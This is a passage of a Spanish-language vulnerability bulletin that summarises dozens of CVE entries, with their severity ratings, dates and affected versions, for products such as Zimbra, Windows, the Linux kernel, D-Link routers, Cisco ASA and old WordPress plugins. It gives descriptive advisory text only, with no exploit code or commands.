    Se ha detectado un problema en Zimbra Collaboration (ZCS) versiones 8.8.15 y 9.0. Un atacante puede descargar archivos arbitrarios mediante amavisd por medio de un loophole de cpio (extracción a /opt/zimbra/jetty/webapps/zimbra/public) que puede conllevar a un acceso incorrecto a cualquier otra cuenta de usuario. Zimbra recomienda pax sobre cpio. Además, pax está en los prerrequisitos de Zimbra en Ubuntu; sin embargo, pax ya no forma parte de una instalación por defecto de Red Hat después de RHEL 6 (o CentOS 6). Una vez instalado pax, amavisd lo prefiere automáticamente sobre cpio.
  • CVE-2021-40017
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    El módulo HW_KEYMASTER carece de la comprobación de validez del formato de la clave. Una explotación con éxito de esta vulnerabilidad puede resultar en un acceso a la memoria fuera de límites
  • CVE-2022-2781
    Severidad: Pendiente de análisis
    Fecha de publicación: 06/10/2022
    Fecha de última actualización: 08/08/2023
    En versiones afectadas de Octopus Server se ha identificado que era usado el mismo proceso de cifrado tanto para cifrar las cookies de sesión como las variables
  • CVE-2022-37680
    Severidad: Pendiente de análisis
    Fecha de publicación: 29/08/2022
    Fecha de última actualización: 08/08/2023
    Un problema de autenticación inadecuada para una función crítica en los productos de red de Hitachi Kokusai Electric para el sistema de supervisión (cámara, decodificador y codificador) y siguientes permite a los atacantes reiniciar el dispositivo de forma remota a través de una solicitud POST manipulada en el punto final /ptipupgrade.cgi. La información de seguridad ID hitachi-sec-2022-001 contiene correcciones para el problema
  • CVE-2022-35837
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de Windows Graphics Component. Este ID de CVE es diferente de CVE-2022-34728, CVE-2022-38006
  • CVE-2022-37975
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Windows Group Policy
  • CVE-2022-37973
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Denegación de Servicio en Windows Local Session Manager (LSM). Este ID de CVE es diferente de CVE-2022-37998
  • CVE-2021-46848
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/10/2022
    Fecha de última actualización: 08/08/2023
    GNU Libtasn1 versiones anteriores a 4.19.0, presenta una comprobación de tamaño de matriz ETYPE_OK fuera de lugar que afecta a la función asn1_encode_simple_der
  • CVE-2022-25844
    Severidad: MEDIA
    Fecha de publicación: 01/05/2022
    Fecha de última actualización: 08/08/2023
    El paquete angular versiones posteriores a 1.7.0 son vulnerables a una Denegación de Servicio por Expresión Regular (ReDoS) al proporcionar una regla de localización personalizada que permite asignar el parámetro en posPre: " ".repeat() de NUMBER_FORMATS.PATTERNS[1].posPre con un valor muy alto. **Nota:** 1) Este paquete ha quedado obsoleto y ya no es mantenido. 2) Las versiones vulnerables son 1.7.0 y superiores
  • CVE-2022-27812
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/08/2022
    Fecha de última actualización: 08/08/2023
    Inundar las versiones 3.7.0 a 3.7.29, 3.11.0 a 3.11.17, 4.2.0 a 4.2.10, y 4.3.0 a 4.3.6 del cortafuegos SNS con tráfico forjado específico, puede conducir a un DoS SNS
  • CVE-2022-37603
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha encontrado un fallo de denegación de servicio de expresión Regular (ReDoS) en la función interpolateName en el archivo interpolateName.js en webpack loader-utils 2.0.0 por medio de la variable url en interpolateName.js
  • CVE-2022-37599
    Severidad: Pendiente de análisis
    Fecha de publicación: 11/10/2022
    Fecha de última actualización: 08/08/2023
    Se ha encontrado un fallo de Denegación de Servicio de Expresión Regular (ReDoS) en la función interpolateName en el archivo interpolateName.js en webpack loader-utils 2.0.0 por medio de la variable resourcePath en el archivo interpolateName.js
  • CVE-2021-38578
    Severidad: ALTA
    Fecha de publicación: 03/03/2022
    Fecha de última actualización: 02/08/2023
    Unas comprobaciones existentes de CommBuffer en SmmEntryPoint no detectan el desbordamiento cuando es calculado BufferSize
  • CVE-2021-43033
    Severidad: ALTA
    Fecha de publicación: 06/12/2021
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en Kaseya Unitrends Backup Appliance versiones anteriores a 10.5.5. Múltiples funciones en el demonio bpserverd eran vulnerables a una ejecución de código remota arbitrario como root. La vulnerabilidad era causada por la entrada no confiable (recibida por el servidor) que se pasaba a las llamadas del sistema.
  • CVE-2022-29281
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Notable versiones anteriores a 1.9.0-beta.8, no previene efectivamente la apertura de archivos ejecutables cuando hace clic en un enlace. Se presenta una comprobación inapropiada el esquema URI del archivo. Un hipervínculo a un recurso compartido SMB podría conllevar a una ejecución de un programa arbitrario (o el robo de credenciales NTLM por medio de un ataque de retransmisión SMB, ya que la aplicación resuelve rutas UNC)
  • CVE-2022-30079
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una vulnerabilidad de inyección de comandos en el firmware Netgear R6200 v2 por medio de R6200v2-V1.0.3.12, por medio del binario /sbin/acos_service, que podría permitir a atacantes remotos autenticados la capacidad de modificar valores en el parámetro vulnerable
  • Vulnerabilidad en los Initial Sequence Numbers (ISN) para conexiones TCP en Nucleus NET, Nucleus ReadyStart para ARM, MIPS y PPC (CVE-2020-28388)
    Severidad: MEDIA
    Fecha de publicación: 09/02/2021
    Fecha de última actualización: 08/08/2023
    Se ha identificado una vulnerabilidad en Capital VSTAR (Todas las versiones), Nucleus NET (Todas las versiones anteriores a V5.2), Nucleus ReadyStart V3 (Todas las versiones anteriores a V2012.12), Nucleus Source Code (Todas las versiones), PLUSCONTROL 1st Gen (Todas las versiones). Los números de secuencia iniciales (ISN) para las conexiones TCP se derivan de una fuente insuficientemente aleatoria. Como resultado, el ISN de las conexiones TCP actuales y futuras podría ser predecible. Un atacante podría secuestrar las sesiones existentes o falsificar las futuras
  • CVE-2022-3564
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/10/2022
    Fecha de última actualización: 04/08/2023
    Se ha encontrado una vulnerabilidad clasificada como crítica en el Kernel de Linux. Esta vulnerabilidad afecta a la función l2cap_reassemble_sdu del archivo net/bluetooth/l2cap_core.c del componente Bluetooth. La manipulación conlleva a un uso de memoria previamente liberada. Es recomendado aplicar un parche para corregir este problema. El identificador asociado a esta vulnerabilidad es VDB-211087
  • CVE-2022-36534
    Severidad: Pendiente de análisis
    Fecha de publicación: 16/09/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Super Flexible Software GmbH & Co. KG Syncovery 9 para Linux versiones v9.47x y anteriores, contiene múltiples vulnerabilidades de ejecución de código remota (RCE) por medio de los parámetros Job_ExecuteBefore y Job_ExecuteAfter en el archivo post_profilesettings.php
  • CVE-2021-35452
    Severidad: MEDIA
    Fecha de publicación: 10/01/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de Control de Acceso Incorrecto en libde265 versión v1.0.8, debido a un SEGV en el archivo slice.cc
  • CVE-2022-27943
    Severidad: MEDIA
    Fecha de publicación: 26/03/2022
    Fecha de última actualización: 08/08/2023
    El archivo libiberty/rust-demangle.c en GNU GCC versión 11.2, permite un consumo de pila en demangle_const, como lo demuestra nm-new
  • CVE-2021-43666
    Severidad: MEDIA
    Fecha de publicación: 24/03/2022
    Fecha de última actualización: 20/07/2023
    Se presenta una vulnerabilidad de denegación de servicio en mbed TLS 3.0.0 y anteriores, en la función mbedtls_pkcs12_derivation cuando la longitud de una contraseña de entrada es 0
  • CVE-2022-3202
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/09/2022
    Fecha de última actualización: 04/08/2023
    Un fallo de desreferencia de puntero NULL en diFree en el archivo fs/jfs/inode.c en Journaled File System (JFS) en el kernel de Linux. Esto podría permitir a un atacante local bloquear el sistema o filtrar información interna del kernel
  • CVE-2022-24697
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/10/2022
    Fecha de última actualización: 08/08/2023
    La función cube designer de Kylin presenta una vulnerabilidad de inyección de comandos cuando son sobrescritos los parámetros del sistema en el menú de sobreescritura de la configuración. Un RCE puede ser implementado cerrando las comillas simples alrededor del valor del parámetro "conf" para inyectar cualquier comando del sistema operativo en los parámetros de la línea de comandos. Esta vulnerabilidad afecta a Kylin 2 versiones 2.6.5 y anteriores, Kylin 3 versiones 3.1.2 y anteriores, y Kylin 4 versiones 4.0.1 y anteriores
  • CVE-2022-37958
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Divulgación de Información de SPNEGO Extended Negotiation (NEGOEX) Security Mechanism
  • CVE-2022-2422
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/10/2022
    Fecha de última actualización: 28/07/2023
    Debido a una incorrecta comprobación de entradas en la biblioteca js Feathers, es posible llevar a cabo un ataque de inyección SQL en la base de datos del back-end, en caso de que sea usado el paquete feathers-sequelize
  • CVE-2022-29823
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/10/2022
    Fecha de última actualización: 28/07/2023
    El método cleanQuery de Feather-Sequalize usa una lógica recursiva no segura para filtrar las claves no soportadas del objeto de consulta. Esto resulta en una ejecución de código remota (RCE) con privilegios de la aplicación
  • CVE-2022-29822
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/10/2022
    Fecha de última actualización: 28/07/2023
    Debido a un filtrado inapropiado de parámetros en la biblioteca Feathers js, que en última instancia puede conllevar a una inyección SQL
  • CVE-2022-32821
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de corrupción de memoria con una comprobación mejorada. Este problema ha sido corregido en watchOS versión 8.7, tvOS versión 15.6, iOS versión 15.6 y iPadOS versión 15.6, macOS Monterey versión 12.5. Una aplicación puede ser capaz de ejecutar código arbitrario con privilegios del kernel
  • CVE-2022-26700
    Severidad: Pendiente de análisis
    Fecha de publicación: 23/09/2022
    Fecha de última actualización: 08/08/2023
    Se abordó un problema de corrupción de memoria con una administración de estados mejorada. Este problema ha sido corregido en tvOS versión 15.5, watchOS versión 8.6, iOS versión 15.5 y iPadOS versión 15.5, macOS Monterey versión 12.4, Safari versión 15.5. El procesamiento de contenido web diseñado de forma maliciosa puede conllevar a una ejecución de código.
  • CVE-2019-11477
    Severidad: ALTA
    Fecha de publicación: 18/06/2019
    Fecha de última actualización: 16/08/2023
    Jonathan Looney detectó que el valor TCP_SKB_CB(skb)-mayor que tcp_gso_segs estuvo sujeto a un desbordamiento de enteros en el kernel de Linux durante el manejo del Reconocimiento Selectivo (SACK) de TCP. Un atacante remoto podría usar esto para causar una denegación de servicio. Esto se ha corregido en versiones de kernel estables 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, y se corrige en el commit 3b4929f65b0d8249f19a50245cd88ed1a2f78cff.
  • CVE-2021-33959
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/01/2023
    Fecha de última actualización: 08/08/2023
    Plex Media Server en las versiones 1.21 y anteriores es vulnerable a un ataque DDos de reflexión a través del servicio plex.
  • CVE-2022-37878
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/09/2022
    Fecha de última actualización: 08/08/2023
    Unas vulnerabilidades en la interfaz de administración basada en web de ClearPass Policy Manager permiten a usuarios remotos autenticados ejecutar comandos arbitrarios en el host subyacente. Una explotación con éxito podría permitir a un atacante ejecutar comandos arbitrarios como root en el sistema operativo subyacente, conllevando a un compromiso completo del sistema en Aruba ClearPass Policy Manager versión(es): 6.10.x: 6.10.6 y anteriores; 6.9.x: 6.9.11 y anteriores. Aruba ha lanzado actualizaciones para Aruba ClearPass Policy Manager que abordan estas vulnerabilidades de seguridad
  • CVE-2022-29835
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/09/2022
    Fecha de última actualización: 21/07/2023
    Los archivos ejecutables del software WD Discovery estaban firmados con un algoritmo hash SHA-1 no seguro. Un atacante podría usar esta debilidad para crear firmas de certificados falsificadas debido al uso de un algoritmo de hashing que no está libre de colisiones. Esto podría afectar a la confidencialidad del contenido del usuario. Este problema afecta a: Western Digital WD Discovery WD Discovery Desktop App versiones anteriores a 4.4.396 en Mac; WD Discovery Desktop App versiones anteriores a 4.4.396 en Windows
  • CVE-2022-33183
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/10/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en Brocade Fabric OS CLI versiones anteriores a Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5, 7.4.2.j, podría permitir a un atacante remoto autenticado llevar a cabo un desbordamiento del búfer de la pila usando en comandos "firmwaredownload" y "diagshow"
  • CVE-2022-33181
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/10/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de divulgación de información en Brocade Fabric OS CLI versiones anteriores a Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5, 7.4.2.j, podría permitir a un atacante local autenticado leer archivos confidenciales usando los comandos del switch "configshow" y "supportlink"
  • CVE-2022-2739
    Severidad: Pendiente de análisis
    Fecha de publicación: 01/09/2022
    Fecha de última actualización: 21/07/2023
    La versión de podman publicada para Red Hat Enterprise Linux 7 Extras por medio del aviso RHSA-2022:2190 incluía una versión incorrecta de podman que carecía de la corrección de CVE-2020-14370, que se había corregido previamente por medio de RHSA-2020:5056. Este problema podría permitir a un atacante acceder a información confidencial almacenada en variables de entorno
  • CVE-2010-3856
    Severidad: ALTA
    Fecha de publicación: 07/01/2011
    Fecha de última actualización: 20/07/2023
    ld.so en la librería de GNU C (también conocida como glibc o libc6) anteriores a v2.11.3, y v2.12.x anteriores a v2.12.2, no restringen el uso de la variable de entorno LD_AUDIT para hacer referencia a objetos dinámicos compartidos (DSO) como objetos de auditoría, que permite a usuarios locales conseguir privilegios mediante el aprovechamiento de un DSO inseguros ubicado en un directorio de la librería de confianza, como lo demuestra libpcprofile.so.
  • CVE-2010-0732
    Severidad: MEDIA
    Fecha de publicación: 19/03/2010
    Fecha de última actualización: 03/08/2023
    gdk/gdkwindow.c en GTK+ anterior a v2.18.5, utilizada en gnome-screensaver anterior a v2.28.1, realiza pinturas implícitas en las ventanas de tipo GDK_WINDOW_FOREIGN, lo que lanza un error X en ciertas circunstancias y consecuentemente permite a atacantes próximos físicamente evitar el bloqueo de pantalla y acceder a un ordenador presionando la tecla Enter durante un cierto tiempo
  • CVE-2012-0056
    Severidad: MEDIA
    Fecha de publicación: 27/01/2012
    Fecha de última actualización: 27/07/2023
    La función mem_write en el kernel de Linux anterior a versión 3.2.2, cuando ASLR está deshabilitado, no comprueba apropiadamente los permisos al escribir en /proc/(pid)/mem, lo que permite a los usuarios locales alcanzar privilegios al modificar la memoria del proceso, como es demostrado por Mempodipper .
  • CVE-2023-25136
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/02/2023
    Fecha de última actualización: 21/07/2023
    OpenSSH server (sshd) v9.1 introdujo una vulnerabilidad de doble liberación durante el manejo de "options.key_algorithms". Esto se ha corregido en OpenSSH v9.2. La doble liberación puede ser aprovechada por un atacante remoto no autenticado en la configuración por defecto, para saltar a cualquier ubicación en el espacio de direcciones de sshd. Un informe de terceros afirma que "la ejecución remota de código es teóricamente posible".
  • CVE-2022-31814
    Severidad: Pendiente de análisis
    Fecha de publicación: 05/09/2022
    Fecha de última actualización: 08/08/2023
    pfSense pfBlockerNG versiones hasta 2.1.4_26, permite a atacantes remotos ejecutar comandos arbitrarios del Sistema Operativo como root por medio de metacaracteres de shell en el encabezado HTTP Host. NOTA: la versión 3.x no está afectada
  • CVE-2022-38258
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/09/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inclusión de archivos locales (LFI) en D-Link DIR 819 versión v1.06, permite a atacantes provocar una Denegación de Servicio (DoS) o acceder a información confidencial del servidor mediante la manipulación del parámetro getpage en una petición web manipulada
  • CVE-2022-36537
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/08/2022
    Fecha de última actualización: 08/08/2023
    ZK Framework versiones v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 y 8.6.4.1, permite a atacantes acceder a información confidencial por medio de una petición POST diseñada enviada al componente AuUploader.
  • CVE-2019-19921
    Severidad: MEDIA
    Fecha de publicación: 12/02/2020
    Fecha de última actualización: 16/08/2023
    runc versiones hasta 1.0.0-rc9, posee un Control de Acceso Incorrecto conllevando a una escalada de privilegios, relacionado con el archivo libcontainer/rootfs_linux.go. Para explotar esto, un atacante debe ser capaz de generar dos contenedores con configuraciones de montaje de volumen personalizadas y ser capaz de ejecutar imágenes personalizadas. (Esta vulnerabilidad no afecta a Docker debido a un detalle de implementación que bloquea el ataque).
  • Vulnerabilidad en el sistema de archivos en las funciones WebVPN o AnyConnec en la URL HTTP en la interfaz de servicios web del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software (CVE-2020-3187)
    Severidad: ALTA
    Fecha de publicación: 06/05/2020
    Fecha de última actualización: 16/08/2023
    Una vulnerabilidad en la interfaz de servicios web del Cisco Adaptive Security Appliance (ASA) Software y el Cisco Firepower Threat Defense (FTD) Software, podría permitir a un atacante remoto no autenticado conducir ataques de tipo salto de directorio y obtener acceso de lectura y eliminación a archivos confidenciales en un sistema apuntado. La vulnerabilidad es debido a una falta de comprobación apropiada de la entrada de la URL HTTP. Un atacante podría explotar esta vulnerabilidad mediante el envío de una petición HTTP diseñada que contenga secuencias de caracteres de salto de directorio. Una explotación podría permitir a un atacante visualizar o eliminar archivos arbitrarios en el sistema apuntado. Cuando el dispositivo es reiniciado después de la explotación de esta vulnerabilidad, todos los archivos que fueron eliminados son restaurados. El atacante solo puede visualizar y eliminar archivos dentro del sistema de archivos de los servicios web. Este sistema de archivos es habilitado cuando el dispositivo afectado es configurado con las funciones WebVPN o AnyConnect. Esta vulnerabilidad no puede ser utilizada para obtener acceso a los archivos del sistema ASA o FTD o los archivos subyacentes del sistema operativo (SO). El reinicio del dispositivo afectado restaurará todos los archivos dentro del sistema de archivos de los servicios web.
  • CVE-2022-21587
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/10/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad en el producto Oracle Web Applications Desktop Integrator de Oracle E-Business Suite (componente: Upload). Las versiones soportadas que están afectadas son 12.2.3-12.2.11. Una vulnerabilidad explotable fácilmente permite a un atacante no autenticado con acceso a la red por medio de HTTP comprometer a Oracle Web Applications Desktop Integrator. Los ataques con éxito de esta vulnerabilidad pueden resultar en la toma de control de Oracle Web Applications Desktop Integrator. CVSS 3.1 Puntuación Base 9.8 (Impactos en la Confidencialidad, Integridad y Disponibilidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • CVE-2022-21222
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/09/2022
    Fecha de última actualización: 08/08/2023
    El paquete css-what versiones anteriores a 2.1.3, es vulnerable a una Denegación de Servicio por Expresión Regular (ReDoS) debido al uso de una expresión regular no segura en la variable re_attr del archivo index.js. La explotación de esta vulnerabilidad podría desencadenarse por medio de la función parse
  • CVE-2022-37130
    Severidad: Pendiente de análisis
    Fecha de publicación: 31/08/2022
    Fecha de última actualización: 08/08/2023
    En D-Link DIR-816 versión A2_v1.10CNB04.img, es producida una vulnerabilidad de inyección de comandos en /goform/Diagnosis, después de que es cumplida la condición, setnum será empalmado con v10 mediante snprintf, y será ejecutado el sistema, resultando en una vulnerabilidad de inyección de comandos
  • CVE-2022-36620
    Severidad: Pendiente de análisis
    Fecha de publicación: 31/08/2022
    Fecha de última actualización: 08/08/2023
    D-link DIR-816 versión A2_v1.10CNB04.img, es vulnerable a un Desbordamiento del Búfer por medio de /goform/addRouting
  • CVE-2022-26258
    Severidad: ALTA
    Fecha de publicación: 27/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que D-Link DIR-820L versión 1.05B03, contiene una vulnerabilidad de ejecución de comandos remota (RCE) por medio del parámetro Device Name en el archivo /lan.asp
  • CVE-2004-0150
    Severidad: ALTA
    Fecha de publicación: 15/04/2004
    Fecha de última actualización: 02/08/2023
    Desbordamiento de búfer en getaddrinfo de Python 2.2 permite a atacantes remotos ejecutar código arbitrario mediante una dirección IPv6 obtenida usando DNS.
  • CVE-2008-0618
    Severidad: MEDIA
    Fecha de publicación: 06/02/2008
    Fecha de última actualización: 02/08/2023
    Múltiples vulnerabilidades de secuencias de comandos en sitios cruzados (XSS) en el plugin DMSGuestbook 1.8.0 y 1.7.0 para WordPress. Permiten a atacantes remotos inyectar secuencias de comandos web o HTML de su elección a través de los parámetros (1) gbname, (2) gbemail, (3) gburl y (4) gbmsg programas sin especificar. NOTA: el origen de esta información es desconocido; los detalles se han obtenido únicamente de información de terceros.
  • CVE-2007-6677
    Severidad: MEDIA
    Fecha de publicación: 09/01/2008
    Fecha de última actualización: 02/08/2023
    Vulnerabilidad de secuencias de comandos en sitios cruzados (XSS) en la extensión Peter's Random Anti-Spam Image 0.2.4 y anteriores para WordPress permite a atacantes remotos inyectar secuencias de comandos web o HTML de su elección a través del campo comentario en el formulario de comentarios.
  • CVE-2007-2052
    Severidad: MEDIA
    Fecha de publicación: 16/04/2007
    Fecha de última actualización: 02/08/2023
    Error de superación de límite (off-by-one) en la función PyLocale_strxfrm de Modules/_localemodule.c para Python 2.4 y 2.5 provoca que se utilice un tamaño de búfer incorrecto para la función strxfrm, lo cual permite a atacantes locales o remotos dependiendo del contexto leer porciones de memoria mediante manipulaciones desconocidas que disparan una lectura fuera de límite del búfer debido a la falta de una terminación null.
  • CVE-2006-4980
    Severidad: ALTA
    Fecha de publicación: 10/10/2006
    Fecha de última actualización: 02/08/2023
    Desbordamiento de bufer en la función repr en Python 2.3 hasta la 2.6 anterior al 22/08/2006 permite a un atacante dependiente del contexto provocar denegación de servicio y posiblemente ejecutar código de su elección a través de secuencias anchas hechas a mano del carácter UTF-32/UCS-4 a ciertas secuencias de comandos.
  • CVE-2007-4165
    Severidad: MEDIA
    Fecha de publicación: 07/08/2007
    Fecha de última actualización: 02/08/2023
    Vulnerabilidad de secuencias de comandos en sitios cruzados (XSS) en index.php de Blue Memories theme 1.5 para WordPress permite a atacantes remotos inyectar secuencias de comandos web o HTML de su elección a través del parámetro s, posiblemente un problema relacionado con CVE-2007-2757 y CVE-2007-4010. NOTA: la procedencia de esta información es desconocida; los detalles se han obtenido exclusivamente de información de terceros.
  • CVE-2007-4559
    Severidad: MEDIA
    Fecha de publicación: 27/08/2007
    Fecha de última actualización: 02/08/2023
    Vulnerabilidad de salto de directorio en las funciones (1) extract y (2) extractall en el módulo tarfile en Python permite a atacantes remotos con la intervención del usuario sobrescribir archivos de su elección a través de la secuencia ..(punto punto) en nombres de archivos en archivos TAR, un asunto relacionado es CVE-2001-1267.
  • CVE-2007-4965
    Severidad: MEDIA
    Fecha de publicación: 18/09/2007
    Fecha de última actualización: 02/08/2023
    Múltiples desbordamientos de entero en el módulo imageop de Python 2.5.1 y anteriores permiten a atacantes locales o remotos (dependiendo del contexto) provocar una denegación de servicio (caída de aplicación) y posiblemente obtener información sensible (contenidos de memoria) mediante argumentos manipulados para (1) el método tovideo, y otros vectores no especificados relacionados con (2) imageop.c, (3) rbgimgmodule.c, y otros archivos, que disparan desbordamientos de búfer basado en montículo.
  • CVE-2008-0198
    Severidad: MEDIA
    Fecha de publicación: 09/01/2008
    Fecha de última actualización: 02/08/2023
    Múltiples vulnerabilidades de falsificación de petición en sitios cruzados (CSRF) en wp-contact-form/options-contactform.php en la extensión WP-ContactForm 1.5 alpha y anteriores para WordPress permiten a atacantes remotos realizar acciones como administradores a través de los parámetros (1) wpcf_question, (2) wpcf_success_msg, o (3) wpcf_error_msg de wp-admin/admin.php.
  • CVE-2008-0491
    Severidad: ALTA
    Fecha de publicación: 30/01/2008
    Fecha de última actualización: 02/08/2023
    Vulnerabilidad de inyección SQL en fim_rss.php en el plugin fGallery 2.4.1 para WordPress permite a atacantes remotos ejecutar comandos arbitrarios SQL a través del parámetro álbum.
  • CVE-2008-0615
    Severidad: MEDIA
    Fecha de publicación: 06/02/2008
    Fecha de última actualización: 02/08/2023
    Vulnerabilidad de salto de directorio en wp-admin/admin.php en el plugin DMSGuestbook 1.8.0 y 1.7.0 para WordPress. Permite a usuarios autentificados remotamente leer archivos de su elección a través de .. (punto punto) en (1) la carpeta y (2) los parámetros del archivo.
  • CVE-2008-0616
    Severidad: MEDIA
    Fecha de publicación: 06/02/2008
    Fecha de última actualización: 02/08/2023
    Vulnerabilidad de inyección SQL en el panel de administración en el plugin DMSGuestbook 1.7.0 para WordPress. Permite a administradores autentificados remotamente ejecutar comandos SQL de su elección a través de vectores no especificados. NOTA: no está claro si esta cuestión cruza los límites de privilegios.
  • CVE-2008-0617
    Severidad: MEDIA
    Fecha de publicación: 06/02/2008
    Fecha de última actualización: 02/08/2023
    Múltiples vulnerabilidades de secuencias de comandos en sitios cruzados (XSS) en el plugin MSGuestbook 1.7.0 para WordPress. Permite a atacantes remotos inyectar secuencias de comandos web o HTML a través del (1) parámetro file a wp-admin/admin.php, o (2) parámetro messagefield en la página guestbook y el (3) parámetro title en messagearea.
  • CVE-2010-1685
    Severidad: ALTA
    Fecha de publicación: 04/05/2010
    Fecha de última actualización: 08/08/2023
    Desbordamiento de búffer basado en pila en CursorArts ZipWrangler v1.20, permite a atacantes remotos asistidos por el usuario ejecutar código de su elección a través de un archivo ZIP que contenga un archivo con un nombre de archivo largo.
  • CVE-2015-0676
    Severidad: ALTA
    Fecha de publicación: 12/04/2015
    Fecha de última actualización: 15/08/2023
    La implementación DNS en Software Cisco Adaptive Security Appliance (ASA) 7.2 anterior a 7.2(5.16), 8.2 anterior a 8.2(5.57), 8.3 anterior a 8.3(2.44), 8.4 anterior a 8.4(7.28), 8.5 anterior a 8.5(1.24), 8.6 anterior a 8.6(1.17), 8.7 anterior a 8.7(1.16), 9.0 anterior a 9.0(4.33), 9.1 anterior a 9.1(6.1), 9.2 anterior a 9.2(3.4), y 9.3 anterior a 9.3(3) permite a atacantes man-in-the-middle causar una denegación de servicio (corrupción de memoria o interrupción de dispositivo) mediante la provocación de consultas DNS salientes y posteriormente el envío de respuestas manipuladas a estas consultas, también conocido como Bug ID CSCuq77655.
  • CVE-2015-0677
    Severidad: ALTA
    Fecha de publicación: 12/04/2015
    Fecha de última actualización: 15/08/2023
    El analizador sintáctico de XML en Software Cisco Adaptive Security Appliance (ASA) Software 8.4 anterior a 8.4(7.28), 8.6 anterior a 8.6(1.17), 9.0 anterior a 9.0(4.33), 9.1 anterior a 9.1(6), 9.2 anterior a 9.2(3.4), y 9.3 anterior a 9.3(3), cuando Clientless SSL VPN, AnyConnect SSL VPN, o AnyConnect IKEv2 VPN se utilizan, permite a atacantes remotos causar una denegación de servicio (interrupción de VPN o recarga de dispositivo) a través de un documento XML manipulado, también conocido como Bug ID CSCus95290.
  • CVE-2014-4873
    Severidad: MEDIA
    Fecha de publicación: 10/10/2014
    Fecha de última actualización: 02/08/2023
    Vulnerabilidad de inyección SQL en TrackItWeb/Grid/GetData en BMC Track-It! 11.3.0.355 permite a usuarios remotos autenticados ejecutar comandos SQL arbitrarios a través de datos POST manipulados.
  • CVE-2014-1949
    Severidad: ALTA
    Fecha de publicación: 16/01/2015
    Fecha de última actualización: 03/08/2023
    GTK+ 3.10.9 y anteriores, utilizado en cinnamon-screensaver, gnome-screensaver, y otras aplicaciones, permite a atacantes físicamente próximos evadir la pantalla de bloqueo mediante la activación del botón del menú.
  • CVE-2016-1379
    Severidad: MEDIA
    Fecha de publicación: 27/05/2016
    Fecha de última actualización: 15/08/2023
    Cisco Adaptive Security Appliance (ASA) Software 9.0 hasta la versión 9.5.1 no maneja correctamente error de procesamiento IPsec, lo que permite a usuarios remotos autenticados provocar una denegación de servicio (consumo de memoria) a través de paquetes túnel VPN manipulados (1) LAN-to-LAN o (2) Remote Access, también conocida como Bug ID CSCuv70576.
  • CVE-2014-4874
    Severidad: MEDIA
    Fecha de publicación: 10/10/2014
    Fecha de última actualización: 02/08/2023
    BMC Track-It! 11.3.0.355 permite a usuarios remotos autenticados leer ficheros arbitrarios mediante la visita a la página TrackItWeb/Attachment.
  • CVE-2014-4872
    Severidad: ALTA
    Fecha de publicación: 10/10/2014
    Fecha de última actualización: 02/08/2023
    BMC Track-It! 11.3.0.355 no requiere la autenticación en el puerto TCP 9010, lo que permite a atacantes remotos subir ficheros arbitrarios, ejecutar código arbitrario u obtener información sensible sobre credenciales y configuraciones a través de una solicitud .NET Remoting en (1) FileStorageService o (2) ConfigurationService.
  • CVE-2011-4077
    Severidad: MEDIA
    Fecha de publicación: 27/01/2012
    Fecha de última actualización: 27/07/2023
    Un desbordamiento de búfer en la función xfs_readlink en fs/xfs/xfs_vnodeops.c en XFS en el kernel de Linux v2.6, cuando CONFIG_XFS_DEBUG está desactivado, permite a usuarios locales provocar una denegación de servicio (corrupción de memoria y caída del sistema) y posiblemente ejecutar código de su elección a través de una imagen XFS que contiene un enlace simbólico con una ruta demasiado larga.
  • CVE-2013-5512
    Severidad: ALTA
    Fecha de publicación: 13/10/2013
    Fecha de última actualización: 15/08/2023
